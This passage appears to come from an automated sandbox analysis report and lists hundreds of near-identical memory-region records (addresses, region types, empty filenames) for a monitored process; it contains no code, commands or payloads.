19547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19565 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19566 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19592 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19593 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19597 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19598 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19599 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19600 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19602 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19603 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19604 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19605 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19606 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19608 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19609 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19610 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19611 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19612 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19613 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19614 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19615 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19616 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19617 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19618 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19619 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19620 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19621 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19622 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19623 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19624 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19625 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19626 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19627 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19628 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19629 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19630 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19631 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19632 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19633 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19634 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19635 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19636 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19637 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19638 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19639 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19640 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19641 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19642 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19643 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19644 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19645 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19646 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19647 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19648 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19649 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19650 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19651 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19652 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19653 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19654 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19655 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19656 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19657 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19658 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19659 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19660 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19663 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19664 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19705 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19708 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 19709 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19731 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 19732 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19733 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name 